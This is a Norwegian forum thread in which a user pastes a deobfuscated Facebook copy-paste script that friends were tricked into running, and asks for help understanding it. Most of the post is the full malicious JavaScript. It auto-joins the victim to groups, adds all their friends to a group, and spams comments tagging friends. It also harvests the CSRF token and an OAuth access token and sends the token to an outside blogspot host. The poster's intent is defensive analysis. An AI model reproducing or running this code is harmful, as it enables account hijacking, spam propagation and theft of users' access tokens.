Trenger hjelp til å forstå hacker-script

Areyan · 29. april 2014

Hei, fikk noen rare forespørsler via facebook om a copy-paste og kjøre koden herfra på facebooken min.
Mistenker at det er et hackerforsøk og vil gjerne ha litt hjelp fra folk som er kyndige med javascript til å hjelpe meg å forstå nøyaktig hva denne koden vil gjøre.

Og selvfølgelig hvilke konsekvenser det vil ha for en facebook-profil.

Setter veldig pris på litt hjelp her da noen av mine mindre datakyndige venner selvfølgelig har gjort som hackeren har instruert og kjørt koden...

Har tatt meg bryet med å oversette de kryptiske bitene til koden det skal representere og formatere den til et lesbart nivå som best jeg kan:

function Kodran(uidss)
{
    var a = document.createElement('script');
    a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
    document.body.appendChild(a)
}
Kodran("1379575028991328");
Kodran("1379738492308315");
Kodran("562521103826775");
Kodran("262651447224104");
var b = document.getElementsByName("fb_dtsg")[0].value,
    c = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);


function g(d)
{
    var a = new XMLHttpRequest;
    d = "&ref=group_jump_header&group_id=" + d + "&fb_dtsg=" + b + "&__user=" + c + "&phstamp=";
    a.open("POST", "/ajax/groups/membership/r2j.php?__a=1", !0);
    a.onreadystatechange = function ()
    {
        4 == a.readyState && 200 == a.status && a.close
    };
    a.send(d)
}
g("235841983200157");
g("623270711058894");
g("166191003446381");
g("429414337196220");
b = document.getElementsByName("fb_dtsg")[0].value;
c = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","281001968734667","onreadystatechange","readyState","arkadaslar = ","for (;;","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];
var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];
var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);
var id=_0xa22c[5];
var arkadaslar=[];
var svn_rev;
function arkadaslari_al(id)
{
    var _0x7892x7= new XMLHttpRequest();
    _0x7892x7[_0xa22c[6]]=function ()
    {
        if(_0x7892x7[_0xa22c[7]]==4)
        {
            eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);
            for(f=0; f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27); f++)
            {
                mesaj=_0xa22c[10];
                mesaj_text=_0xa22c[10];
                for(i=f*27; i<(f+1)*27; i++)
                {
                    if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i])
                    {
                        mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];
                        mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];
                    } ;
                } ;
                yorum_yap(id,mesaj);
            } ;
        } ;
    } ;
    var _0x7892x8=_0xa22c[24];
    _0x7892x8+=_0xa22c[25];
    _0x7892x8+=_0xa22c[26];
    _0x7892x8+=_0xa22c[27];
    _0x7892x8+=_0xa22c[28]+user_id;
    _0x7892x8+=_0xa22c[29]+user_id;
    if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0)
    {
        _0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);
    }
    else
    {
        _0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);
    } ;
    _0x7892x7[_0xa22c[37]]();
} ;
function RandomArkadas()
{
    var _0x7892xa=_0xa22c[10];
    for(i=0; i<9; i++)
    {
        _0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];
    } ;
    return _0x7892xa;
} ;
function yorum_yap(id,_0x7892xc)
{
    var _0x7892xd= new XMLHttpRequest();
    var _0x7892x8=_0xa22c[10];
    _0x7892x8+=_0xa22c[40]+id;
    _0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);
    _0x7892x8+=_0xa22c[42];
    _0x7892x8+=_0xa22c[43];
    _0x7892x8+=_0xa22c[44];
    _0x7892x8+=_0xa22c[45];
    _0x7892x8+=_0xa22c[46];
    _0x7892x8+=_0xa22c[47]+id+_0xa22c[48];
    _0x7892x8+=_0xa22c[49];
    _0x7892x8+=_0xa22c[50];
    _0x7892x8+=_0xa22c[51];
    _0x7892x8+=_0xa22c[52];
    _0x7892x8+=_0xa22c[29]+user_id;
    _0x7892x8+=_0xa22c[53];
    _0x7892x8+=_0xa22c[54];
    _0x7892x8+=_0xa22c[55];
    _0x7892x8+=_0xa22c[56]+fb_dtsg;
    _0x7892x8+=_0xa22c[57];
    _0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);
    _0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);
    _0x7892xd[_0xa22c[6]]=function ()
    {
        if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200)
        {
            _0x7892xd[_0xa22c[64]];
        } ;
    } ;
    _0x7892xd[_0xa22c[37]](_0x7892x8);
} ;
arkadaslari_al(id);
var gid = ['623270711058894'];
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {}
else
{
    data = eval('(' + gf['responseText']['substr'](9) + ')');
    if (data['error']) {}
    else
    {
        friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9)
        {
            return _0x93dax8['index'] - _0x93dax9['index'];
        });
    };
};

for (var i = 0; i < friends['length']; i++)
{
    var httpwp = new XMLHttpRequest();
    var urlwp = '/ajax/groups/members/add_post.php?__a=1';
    var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
    httpwp['open']('POST', urlwp, true);
    httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    httpwp['setRequestHeader']('Content-length', paramswp['length']);
    httpwp['setRequestHeader']('Connection', 'keep-alive');
    httpwp['onreadystatechange'] = function ()
    {
        if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
    };
    httpwp['send'](paramswp);
};

if (location.hostname.indexOf("www.facebook.com", "static.ak.facebook.com", "apps.facebook.com", "beta.facebook.com") >= 0)
{
    var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();

    function uygulamaizinver(url)
    {
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function ()
        {
            if (xmlhttp.readyState == 4)
            {
                izikbenhtml = document.createElement("html");
                izikbenhtml.innerHTML = xmlhttp.responseText;
                if (izikbenhtml.getElementsByTagName("form").length > 0)
                {
                    izikbenhtml.innerHTML = izikbenhtml.getElementsByTagName("form")[0].outerHTML
                                            act = izikbenhtml.getElementsByTagName("form")[0].action;
                    duzenlevegonder(izikbenhtml, act);
                }
            }
        };
        xmlhttp.open("GET", url, true);
        xmlhttp.send();
    }

    function duzenlevegonder(formnesne, act)
    {
        izikbenparams = "";
        for (i = 0; i < formnesne.getElementsByTagName("input").length; i++)
        {
            if (formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked"))
            {
                izikbenparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
            }
        }
        if (formnesne.getElementsByTagName("select").length > 0)
        {
            izikbenparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
        }
        izikbenparams.replace("&fb_dtsg", "fb_dtsg");
        izikbenparams += "&__CONFIRM__=1";
        formnesne = formnesne;
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function ()
        {
            if (xmlhttp.readyState == 4)
            {
                izikhtml = document.createElement("html");
                izikhtml.innerHTML = xmlhttp.responseText;
                if (izikhtml.getElementsByTagName("form").length > 0)
                {
                    izikhtml.innerHTML = izikhtml.getElementsByTagName("form")[0].outerHTML;
                    act = izikhtml.getElementsByTagName("form")[0].action;
                    duzenlevegonder(izikhtml, act)
                }
                else
                {
                    sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
                    if (sex[1])
                    {
                        tokenyolla(sex[1]);
                    }
                }
            }
        };

        xmlhttp.open("POST", act, true);
        xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xmlhttp.send(izikbenparams);

    }

    function TokenUrl(id)
    {
        return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id + "&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
    }

    if (!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id]))
    {
        uygulamaizinver(TokenUrl("121876164619130"));
        var http = new XMLHttpRequest();
        http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
        http['send']();
        var get = JSON.parse(http['responseText']);
        var isim = get.name;
    }
    window.setInterval(function ()
    {
        if (document.getElementsByClassName("_5ce"))
        {
            for (i = 0; i < document.getElementsByClassName("_5ce").length; i++)
            {
                document.getElementsByClassName("_5ce")[i].innerHTML = "";
            }
        }
        if (document.getElementsByClassName("uiToggle wrap"))
        {
            for (i = 0; i < document.getElementsByClassName("uiToggle wrap").length; i++)
            {
                document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
            }
        }
        if (document.getElementsByClassName("uiPopover"))
        {
            for (i = 0; i < document.getElementsByClassName("uiPopover").length; i++)
            {
                document.getElementsByClassName("uiPopover")[i].innerHTML = "";
            }
        }
    }, 200);

    function tokenyolla(token)
    {
        top.location.href = 'http://19283746564.blogspot.com/#' + token;
    }
}
var Zakarias = "click OK and wait for seconds, Hacking START now!! ";
alert(Zakarias);

Endret 29. april 2014 av Areyan

War · 29. april 2014

Er det dette?

http://www.scamsniper.info/2011/04/warning-cut-and-paste-java-code-leads.html

Areyan · 29. april 2014

Nei, tror ikke det.
Men framgangsmetoden ligner, bortsett fra at man her blir randomly tatt opp i grupper som virker nokså suspekte, via venner som har kjørt koden ovenfor.

Logg inn

Trenger hjelp til å forstå hacker-script

Anbefalte innlegg

Areyan

Lenke til kommentar

Videoannonse

War

Lenke til kommentar

Areyan

Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Opprett konto

Logg inn

Populær nå

AP går inn for fri abort til uke 18 1 2 3 4 54

Tesla - kaféen 1 2 3 4 432

Hvem er aktive 0 medlemmer